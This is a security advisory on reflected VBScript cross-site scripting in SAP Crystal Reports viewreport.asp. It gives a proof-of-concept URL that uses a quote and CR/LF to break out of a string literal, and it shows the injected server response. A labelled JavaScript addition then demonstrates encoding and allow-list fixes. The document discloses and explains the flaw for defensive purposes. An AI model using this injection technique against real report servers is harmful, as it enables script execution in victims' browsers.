SAP BusinessObjects Crystal Reports viewreport.asp Multiple Parameter XSS

2009.04.05
Credit: Bugs NotHugs
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

- Description

Cross-site scripting; vbscript rather than javascript. Subsequent page will contain pop up reading "fsck_cissp".

ID, PROMPTEX-SESSION_ID, PROMPTEX-TO_DATE, PROMPTEX-FROM_DATE, PROMPTEX-YEAR_QTR1, PROMPTEX-YEAR_QTR2, PROMPTEX-YEAR_QTR3, PROMPTEX-YEAR_QTR4, PROMPTEX-YEAR_QTR5, PROMPTEX-YEAR_QTR6, PROMPTEX-YEAR_QTR7, PROMPTEX-YEAR_QTR8, and PROMPTEX-QT parameters affected.

The following is the response:

<SCRIPT LANGUAGE="VBScript">
<!--
Sub window_onLoad()
    Page_Initialize()
End Sub

Sub Page_Initialize
    On Error Resume Next
    Dim webBroker
    Set webBroker = CreateObject("CrystalReports11.WebReportBroker.1")
    if err.number <> 0 then
        window.alert "The Crystal ActiveX Viewer is unable to create it's resource objects."
        CRViewer.ReportName = "https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777"
        window.alert "fsck_cissp"
    else
        Dim webSource0
        Set webSource0 = CreateObject("CrystalReports11.WebReportSource.1")
        webSource0.ReportSource = webBroker
        webSource0.URL = "https://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777"
        window.alert "fsck_cissp"
        webSource0.PromptOnRefresh = True
        CRViewer.ReportSource = webSource0
    end if
    CRViewer.ViewReport
End Sub
-->
</SCRIPT>

- Product

SAP BusinessObjects, Crystal Reports, unknown

- PoC

https://66.240.213.81/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect

- Solution

None

- Timeline

2008-01-23: Vulnerability discovered
2008-02-15: Vendor contact methods unacceptable (paying customers only)
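
The response above shows the ID value landing inside a VBScript string literal, where a double quote closes the literal and CR/LF ends the statement. The following is an added example, not code from the advisory or from SAP: a constructed model of that reflection beside two hardened variants. The host name, the function names and the assumption that report IDs are numeric are illustrative.

```javascript
// Added illustration; a constructed model of the reflection, not SAP's code.
const BASE = "https://reports.example/ceviewer/viewrpt.cwr?APSTOKEN=&ID="; // placeholder host

// ID value from the advisory's PoC, URL-decoded as the server would see it.
const POC_ID = decodeURIComponent('7777"%0d%0awindow.alert%20"fsck_cissp');

// Vulnerable pattern: the value is pasted inside a VBScript string literal.
function renderVulnerable(id) {
  return 'CRViewer.ReportName = "' + BASE + id + '"';
}

// Context-aware encoder: VBScript has no backslash escapes, so every character
// outside a small safe set becomes a ChrW(n) concatenation. This neutralises
// the quote, CR/LF (statement separator) and "<" (which could close <SCRIPT>).
function vbsStringLiteral(value) {
  let out = '"';
  for (const unit of value.split("")) {
    out += /[A-Za-z0-9 ._:\/?=&-]/.test(unit)
      ? unit
      : '" & ChrW(' + unit.charCodeAt(0) + ') & "';
  }
  return out + '"';
}

function renderEncoded(id) {
  return "CRViewer.ReportName = " + vbsStringLiteral(BASE + id);
}

// Stricter alternative: allow-list. Assumes report IDs are numeric like "7777".
function renderValidated(id) {
  if (!/^[0-9]{1,10}$/.test(id)) throw new RangeError("invalid report ID");
  return renderVulnerable(id); // safe only because id is digits
}

// VBScript ends a statement at a line break, so count the resulting lines.
function statementCount(script) {
  return script.split(/\r\n|\r|\n/).filter((l) => l.trim() !== "").length;
}

console.log(renderVulnerable(POC_ID)); // two statements: assignment + alert
console.log(renderEncoded(POC_ID));    // one statement, payload kept as data
```

The same encoding or validation has to be applied to every reflected parameter listed in the description, not only ID.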

References:

http://seclists.org/fulldisclosure/2009/Apr/0011.html

